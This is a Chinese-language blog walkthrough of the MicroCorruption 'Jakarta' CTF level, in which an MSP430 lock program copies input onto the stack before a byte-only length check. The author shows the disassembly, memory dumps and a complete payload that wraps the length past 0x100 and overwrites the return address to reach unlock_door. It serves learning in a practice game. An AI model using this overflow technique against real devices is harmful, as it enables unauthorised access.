[MicroCorruption] Jakarta – Chiang E's Blog

既然第一次写MicroCorruption，必须先安利一下这个网站：https://microcorruption.com/

反正我安利的网站都有一个特点，就是很适合很适合小白，所以大佬们请移玉臀。

这是一张MicroCorruption网站的截图，网站的title其实是Embedded Security CTF，是嵌入式设备的CTF。

说得好听是嵌入式设备的CTF，其实只不过是单片机的Pwn而已。小白能力有限，Pwn一下Msp430，是一个不错的开始。

下面是游戏的界面。

这个游戏的设定是有一把Msp430控制的锁，你现在要在不知道密码的情况下，利用二进制漏洞把它打开。它的每一关都是世界上的一个地名，可能意思是要你征战全世界？Whatever.

游戏给你提供了一个调试器，可以从界面看到反汇编的代码，内存的情况，特殊寄存器的情况等。调试器通过Debugger Console控制。刚开始学习的话可以看看它给的Tutorial，非常有用。

于是我们就可以开始今天的游戏了。

学期开始的时候我花了两三天打了几个，感觉醍醐灌顶。但是后来苦于项目结题以及考试什么的，就一直搁置了…悲痛欲绝…

现在终于可以继续了！这次是Jakarta.

以下是汇编代码：

完整版的附件在此：pwn_integer_overflow

0010 <__trap_interrupt>
0010:  3041           ret
4400 <__init_stack>
4400:  3140 0044      mov	#0x4400, sp
4404 <__low_level_init>
4404:  1542 5c01      mov	&0x015c, r5
4408:  75f3           and.b	#-0x1, r5
440a:  35d0 085a      bis	#0x5a08, r5
440e <__do_copy_data>
440e:  3f40 0200      mov	#0x2, r15
4412:  0f93           tst	r15
4414:  0724           jz	#0x4424 <__do_clear_bss+0x0>
4416:  8245 5c01      mov	r5, &0x015c
441a:  2f83           decd	r15
441c:  9f4f 0a47 0024 mov	0x470a(r15), 0x2400(r15)
4422:  f923           jnz	#0x4416 <__do_copy_data+0x8>
4424 <__do_clear_bss>
4424:  3f40 0004      mov	#0x400, r15
4428:  0f93           tst	r15
442a:  0624           jz	#0x4438 <main+0x0>
442c:  8245 5c01      mov	r5, &0x015c
4430:  1f83           dec	r15
4432:  cf43 0224      mov.b	#0x0, 0x2402(r15)
4436:  fa23           jnz	#0x442c <__do_clear_bss+0x8>
4438 <main>
4438:  3150 18fc      add	#0xfc18, sp
443c:  b012 6045      call	#0x4560 <login>
4440:  0f43           clr	r15
4442 <__stop_progExec__>
4442:  32d0 f000      bis	#0xf0, sr
4446:  fd3f           jmp	#0x4442 <__stop_progExec__+0x0>
4448 <__ctors_end>
4448:  3040 0847      br	#0x4708 <_unexpected_>
444c <unlock_door>
444c:  3012 7f00      push	#0x7f
4450:  b012 6446      call	#0x4664 <INT>
4454:  2153           incd	sp
4456:  3041           ret
4458 <test_username_and_password_valid>
4458:  0412           push	r4
445a:  0441           mov	sp, r4
445c:  2453           incd	r4
445e:  2183           decd	sp
4460:  c443 fcff      mov.b	#0x0, -0x4(r4)
4464:  3e40 fcff      mov	#0xfffc, r14
4468:  0e54           add	r4, r14
446a:  0e12           push	r14
446c:  0f12           push	r15
446e:  3012 7d00      push	#0x7d
4472:  b012 6446      call	#0x4664 <INT>
4476:  5f44 fcff      mov.b	-0x4(r4), r15
447a:  8f11           sxt	r15
447c:  3152           add	#0x8, sp
447e:  3441           pop	r4
4480:  3041           ret
4482 .strings:
4482: "Authentication requires a username and password."
44b3: "Your username and password together may be no more than 32 characters."
44fa: "Please enter your username:"
4516: "Please enter your password:"
4532: "Access granted."
4542: "That password is not correct."
4560 <login>
4560:  0b12           push	r11
4562:  3150 deff      add	#0xffde, sp
4566:  3f40 8244      mov	#0x4482 "Authentication requires a username and password.", r15
456a:  b012 c846      call	#0x46c8 <puts>
456e:  3f40 b344      mov	#0x44b3 "Your username and password together may be no more than 32 characters.", r15
4572:  b012 c846      call	#0x46c8 <puts>
4576:  3f40 fa44      mov	#0x44fa "Please enter your username:", r15
457a:  b012 c846      call	#0x46c8 <puts>
457e:  3e40 ff00      mov	#0xff, r14
4582:  3f40 0224      mov	#0x2402, r15
4586:  b012 b846      call	#0x46b8 <getsn>
458a:  3f40 0224      mov	#0x2402, r15
458e:  b012 c846      call	#0x46c8 <puts>
4592:  3f40 0124      mov	#0x2401, r15
4596:  1f53           inc	r15
4598:  cf93 0000      tst.b	0x0(r15)
459c:  fc23           jnz	#0x4596 <login+0x36>
459e:  0b4f           mov	r15, r11
45a0:  3b80 0224      sub	#0x2402, r11
45a4:  3e40 0224      mov	#0x2402, r14
45a8:  0f41           mov	sp, r15
45aa:  b012 f446      call	#0x46f4 <strcpy>
45ae:  7b90 2100      cmp.b	#0x21, r11
45b2:  0628           jnc	#0x45c0 <login+0x60>
45b4:  1f42 0024      mov	&0x2400, r15
45b8:  b012 c846      call	#0x46c8 <puts>
45bc:  3040 4244      br	#0x4442 <__stop_progExec__>
45c0:  3f40 1645      mov	#0x4516 "Please enter your password:", r15
45c4:  b012 c846      call	#0x46c8 <puts>
45c8:  3e40 1f00      mov	#0x1f, r14
45cc:  0e8b           sub	r11, r14
45ce:  3ef0 ff01      and	#0x1ff, r14
45d2:  3f40 0224      mov	#0x2402, r15
45d6:  b012 b846      call	#0x46b8 <getsn>
45da:  3f40 0224      mov	#0x2402, r15
45de:  b012 c846      call	#0x46c8 <puts>
45e2:  3e40 0224      mov	#0x2402, r14
45e6:  0f41           mov	sp, r15
45e8:  0f5b           add	r11, r15
45ea:  b012 f446      call	#0x46f4 <strcpy>
45ee:  3f40 0124      mov	#0x2401, r15
45f2:  1f53           inc	r15
45f4:  cf93 0000      tst.b	0x0(r15)
45f8:  fc23           jnz	#0x45f2 <login+0x92>
45fa:  3f80 0224      sub	#0x2402, r15
45fe:  0f5b           add	r11, r15
4600:  7f90 2100      cmp.b	#0x21, r15
4604:  0628           jnc	#0x4612 <login+0xb2>
4606:  1f42 0024      mov	&0x2400, r15
460a:  b012 c846      call	#0x46c8 <puts>
460e:  3040 4244      br	#0x4442 <__stop_progExec__>
4612:  0f41           mov	sp, r15
4614:  b012 5844      call	#0x4458 <test_username_and_password_valid>
4618:  0f93           tst	r15
461a:  0524           jz	#0x4626 <login+0xc6>
461c:  b012 4c44      call	#0x444c <unlock_door>
4620:  3f40 3245      mov	#0x4532 "Access granted.", r15
4624:  023c           jmp	#0x462a <login+0xca>
4626:  3f40 4245      mov	#0x4542 "That password is not correct.", r15
462a:  b012 c846      call	#0x46c8 <puts>
462e:  3150 2200      add	#0x22, sp
4632:  3b41           pop	r11
4634:  3041           ret
4636 <__do_nothing>
4636:  3041           ret
4638:  496e           addc.b	r14, r9
463a:  7661           addc.b	@sp+, r6
463c:  6c69           addc.b	@r9, r12
463e:  6420           jnz	#0x4708 <_unexpected_+0x0>
4640:  5061 7373      addc.b	0x7373(sp), pc
4644:  776f           addc.b	@r15+, r7
4646:  7264           addc.b	@r4+, sr
4648:  204c           br	@r12
464a:  656e           addc.b	@r14, r5
464c:  6774           subc.b	@r4, r7
464e:  683a           jl	#0x4320 <__none__+0x4320>
4650:  2070           subc	@pc, pc
4652:  6173           subc.b	#0x2, sp
4654:  7377           .word	0x7773
4656:  6f72           subc.b	#0x4, r15
4658:  6420           jnz	#0x4722 <_unexpected_+0x1a>
465a:  746f           addc.b	@r15+, r4
465c:  6f20           jnz	#0x473c <_unexpected_+0x34>
465e:  6c6f           addc.b	@r15, r12
4660:  6e67           addc.b	@r7, r14
4662:  2e00           .word	0x002e
4664 <INT>
4664:  1e41 0200      mov	0x2(sp), r14
4668:  0212           push	sr
466a:  0f4e           mov	r14, r15
466c:  8f10           swpb	r15
466e:  024f           mov	r15, sr
4670:  32d0 0080      bis	#0x8000, sr
4674:  b012 1000      call	#0x10
4678:  3241           pop	sr
467a:  3041           ret
467c <putchar>
467c:  2183           decd	sp
467e:  0f12           push	r15
4680:  0312           push	#0x0
4682:  814f 0400      mov	r15, 0x4(sp)
4686:  b012 6446      call	#0x4664 <INT>
468a:  1f41 0400      mov	0x4(sp), r15
468e:  3150 0600      add	#0x6, sp
4692:  3041           ret
4694 <getchar>
4694:  0412           push	r4
4696:  0441           mov	sp, r4
4698:  2453           incd	r4
469a:  2183           decd	sp
469c:  3f40 fcff      mov	#0xfffc, r15
46a0:  0f54           add	r4, r15
46a2:  0f12           push	r15
46a4:  1312           push	#0x1
46a6:  b012 6446      call	#0x4664 <INT>
46aa:  5f44 fcff      mov.b	-0x4(r4), r15
46ae:  8f11           sxt	r15
46b0:  3150 0600      add	#0x6, sp
46b4:  3441           pop	r4
46b6:  3041           ret
46b8 <getsn>
46b8:  0e12           push	r14
46ba:  0f12           push	r15
46bc:  2312           push	#0x2
46be:  b012 6446      call	#0x4664 <INT>
46c2:  3150 0600      add	#0x6, sp
46c6:  3041           ret
46c8 <puts>
46c8:  0b12           push	r11
46ca:  0b4f           mov	r15, r11
46cc:  073c           jmp	#0x46dc <puts+0x14>
46ce:  1b53           inc	r11
46d0:  8f11           sxt	r15
46d2:  0f12           push	r15
46d4:  0312           push	#0x0
46d6:  b012 6446      call	#0x4664 <INT>
46da:  2152           add	#0x4, sp
46dc:  6f4b           mov.b	@r11, r15
46de:  4f93           tst.b	r15
46e0:  f623           jnz	#0x46ce <puts+0x6>
46e2:  3012 0a00      push	#0xa
46e6:  0312           push	#0x0
46e8:  b012 6446      call	#0x4664 <INT>
46ec:  2152           add	#0x4, sp
46ee:  0f43           clr	r15
46f0:  3b41           pop	r11
46f2:  3041           ret
46f4 <strcpy>
46f4:  0d4f           mov	r15, r13
46f6:  023c           jmp	#0x46fc <strcpy+0x8>
46f8:  1e53           inc	r14
46fa:  1d53           inc	r13
46fc:  6c4e           mov.b	@r14, r12
46fe:  cd4c 0000      mov.b	r12, 0x0(r13)
4702:  4c93           tst.b	r12
4704:  f923           jnz	#0x46f8 <strcpy+0x4>
4706:  3041           ret
4708 <_unexpected_>
4708:  0013           reti	pc

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

4560 <login>

4560: 0b12 push r11

4562: 3150 deff add #0xffde, sp

4566: 3f40 8244 mov #0x4482 "Authentication requires a username and password.", r15

456a: b012 c846 call #0x46c8 <puts>

456e: 3f40 b344 mov #0x44b3 "Your username and password together may be no more than 32 characters.", r15

4572: b012 c846 call #0x46c8 <puts>

4576: 3f40 fa44 mov #0x44fa "Please enter your username:", r15

457a: b012 c846 call #0x46c8 <puts>

457e: 3e40 ff00 mov #0xff, r14

4582: 3f40 0224 mov #0x2402, r15

4586: b012 b846 call #0x46b8 <getsn>

458a: 3f40 0224 mov #0x2402, r15

458e: b012 c846 call #0x46c8 <puts>

4592: 3f40 0124 mov #0x2401, r15

4596: 1f53 inc r15

4598: cf93 0000 tst.b 0x0(r15)

459c: fc23 jnz #0x4596 <login+0x36>

459e: 0b4f mov r15, r11

45a0: 3b80 0224 sub #0x2402, r11

45a4: 3e40 0224 mov #0x2402, r14

45a8: 0f41 mov sp, r15

45aa: b012 f446 call #0x46f4 <strcpy>

45ae: 7b90 2100 cmp.b #0x21, r11

45b2: 0628 jnc #0x45c0 <login+0x60>

45b4: 1f42 0024 mov &0x2400, r15

45b8: b012 c846 call #0x46c8 <puts>

45bc: 3040 4244 br #0x4442 <__stop_progExec__>

45c0: 3f40 1645 mov #0x4516 "Please enter your password:", r15

45c4: b012 c846 call #0x46c8 <puts>

45c8: 3e40 1f00 mov #0x1f, r14

45cc: 0e8b sub r11, r14

45ce: 3ef0 ff01 and #0x1ff, r14

45d2: 3f40 0224 mov #0x2402, r15

45d6: b012 b846 call #0x46b8 <getsn>

45da: 3f40 0224 mov #0x2402, r15

45de: b012 c846 call #0x46c8 <puts>

45e2: 3e40 0224 mov #0x2402, r14

45e6: 0f41 mov sp, r15

45e8: 0f5b add r11, r15

45ea: b012 f446 call #0x46f4 <strcpy>

45ee: 3f40 0124 mov #0x2401, r15

45f2: 1f53 inc r15

45f4: cf93 0000 tst.b 0x0(r15)

45f8: fc23 jnz #0x45f2 <login+0x92>

45fa: 3f80 0224 sub #0x2402, r15

45fe: 0f5b add r11, r15

4600: 7f90 2100 cmp.b #0x21, r15

4604: 0628 jnc #0x4612 <login+0xb2>

4606: 1f42 0024 mov &0x2400, r15

460a: b012 c846 call #0x46c8 <puts>

460e: 3040 4244 br #0x4442 <__stop_progExec__>

4612: 0f41 mov sp, r15

4614: b012 5844 call #0x4458 <test_username_and_password_valid>

4618: 0f93 tst r15

461a: 0524 jz #0x4626 <login+0xc6>

461c: b012 4c44 call #0x444c <unlock_door>

4620: 3f40 3245 mov #0x4532 "Access granted.", r15

4624: 023c jmp #0x462a <login+0xca>

4626: 3f40 4245 mov #0x4542 "That password is not correct.", r15

462a: b012 c846 call #0x46c8 <puts>

462e: 3150 2200 add #0x22, sp

4632: 3b41 pop r11

4634: 3041 ret

完整来看是有一丢丢的长，但其实我们关注的重点放在<login>函数就好了。

曾经我在Youtube上见过大神手画Control flow，很帅。

于是我也来画一下好了。

username输入 “AB”*8 观察一下内存：

这个字符串首先会被存在一个缓冲区

然后数完长度之后会被<strcpy>copy到目标的内存，其实也就是栈里。

这个时候我们看到了，在栈底，有一个似曾相识的数字，4044？是什么？

显然这就是小端存储的<login>的返回地址4440了，这也是我们通过栈溢出能压到的唯一一个返回地址。

这个程序比较奇葩的一点是长度检查是在copy之后进行的。

45aa:  b012 f446      call	#0x46f4 <strcpy>
45ae:  7b90 2100      cmp.b	#0x21, r11
45b2:  0628           jnc	#0x45c0 <login+0x60>
...
45ea:  b012 f446      call	#0x46f4 <strcpy>
45ee:  3f40 0124      mov	#0x2401, r15
45f2:  1f53           inc	r15
45f4:  cf93 0000      tst.b	0x0(r15)
45f8:  fc23           jnz	#0x45f2 <login+0x92>
45fa:  3f80 0224      sub	#0x2402, r15
45fe:  0f5b           add	r11, r15
4600:  7f90 2100      cmp.b	#0x21, r15
4604:  0628           jnc	#0x4612 <login+0xb2>

45aa: b012 f446 call #0x46f4 <strcpy>

45ae: 7b90 2100 cmp.b #0x21, r11

45b2: 0628 jnc #0x45c0 <login+0x60>

...

45ea: b012 f446 call #0x46f4 <strcpy>

45ee: 3f40 0124 mov #0x2401, r15

45f2: 1f53 inc r15

45f4: cf93 0000 tst.b 0x0(r15)

45f8: fc23 jnz #0x45f2 <login+0x92>

45fa: 3f80 0224 sub #0x2402, r15

45fe: 0f5b add r11, r15

4600: 7f90 2100 cmp.b #0x21, r15

4604: 0628 jnc #0x4612 <login+0xb2>

两次都是这个样子。其实送人头送得很明显，意思就是你无论如何都能把你的输入送到栈里，只不过后面的长度校验你可能通不过。

那于是我们的目标就会变成绕过后面的长度检查。这里的漏洞实际上就是这两句代码：

4600:  7f90 2100      cmp.b	#0x21, r15
4604:  0628           jnc	#0x4612 <login+0xb2>

1 2	4600: 7f90 2100 cmp.b #0x21, r15 4604: 0628 jnc #0x4612 <login+0xb2>

查一查cmp.b，就会知道.b是指令助记符后缀，会导致字节操作，相当于是判断下面这个式子。

(r15 & 0xff) >= 0x20

1	(r15 & 0xff) >= 0x20

也就是说，尽管r15是16位的寄存器，比较的时候也只比较低八位。所以就很清楚了，可以通过溢出r15到0x0100使得低八位小于等于0x20。

这个就有些类似于所谓的整数溢出漏洞。

于是我们就可以开始构造Payload。

需要注意两点：

第一轮的校验在长度不超过0x20的时候可以通过
第二轮的校验，因为需要覆盖<login>的返回地址，所以必须通过溢出r15绕过

所以将Payload放在第一轮的32个字节内，然后将返回地址覆盖为Payload的起始地址即可。

我们目标的内存状态是这样的：

3ff0:	da45 3040 1c46 4141 4141 4141 4141 4141
4000:	4141 4141 4141 4141 4141 4141 4141 4141
4010:	4141 4242 4242 f23f 4242 4242 4142 4242
.......
40f0:	4242 00

3ff0: da45 3040 1c46 4141 4141 4141 4141 4141

4000: 4141 4141 4141 4141 4141 4141 4141 4141

4010: 4141 4242 4242 f23f 4242 4242 4142 4242

.......

40f0: 4242 00

这样通过整数溢出绕过第二轮的校验之后，<login>调用<test_username_and_password_valid>会得到密码错误，然后结束ret。

这个时候的返回地址被覆盖成了3ff2，于是程序寄存器就是变为3ff2，指向语句30401c46。

30401c46是 mov #461c, pc 的机器码，这个需要通过网站提供的汇编器获得，如下图。

于是可以将Payload构造如下：

username: “30401c46″+”41″*(0x20-4)

password: “42”*4+”f23f”+”42″*(0x100-0x20-6)

可见r15被溢出成了0x0100，内存也已经变成我们想要的样子了。

接下来我们看到，第二次校验被绕过，程序继续执行。

最后结果，当然是很明显的。

Leave a Comment Cancel Reply